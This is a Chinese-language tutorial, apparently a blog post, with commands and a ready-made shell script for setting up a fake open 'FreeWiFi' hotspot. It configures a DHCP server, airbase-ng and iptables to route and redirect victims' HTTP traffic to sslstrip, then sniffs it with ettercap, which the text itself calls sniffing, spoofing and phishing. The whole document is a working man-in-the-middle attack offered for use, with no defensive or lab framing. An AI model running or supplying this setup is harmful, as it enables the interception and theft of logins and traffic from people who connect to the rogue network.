安装isc-dhcp-server
修改dhcpd.conf为如下:
authoritative;
default-lease-time 700;
max-lease-time 8000;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name "FreeWiFi";
option domain-name-servers 10.0.0.1;
range 10.0.0.10 10.0.0.100;
}
然后激活网卡至监听模式:
airmon-ng start wlan0airbase-ng -e FreeWiFi -c 6 wlan0mon
此时虚拟wifi的信号已经发送出去了,如果出现错误:
Error: Got channel -1, expected a value > 0.
执行如下命令:
airmon-ng stop wlan0mon
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
然后从激活网卡至监听模式那里重新开始。
接着执行如下命令:
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start
虚拟WiFir热点创建成功,接下来就是嗅探欺骗钓鱼了:
sslstrip -fpk 10000
ettercap -Tpuqi at0
为了方便使用做了一个脚本,内容如下:
#!/bin/sh
echo "即将创建WiFi热点,请确保dhcpd.conf已经配置好!" &
sleep 1
service isc-dhcp-server stop &
sleep 1
ifconfig wlan0 down #wlan0修改成你的网卡
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng start wlan0 &
sleep 3
airbase-ng -e FreeWiFi -c 6 wlan0 & #修改成自己的热点名称和信道
sleep 3
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush && iptables --table nat --flush && iptables --table nat --flush && iptables --table nat --delete-chain &
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.16.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
sleep 2
/etc/init.d/isc-dhcp-server start &
sleep 3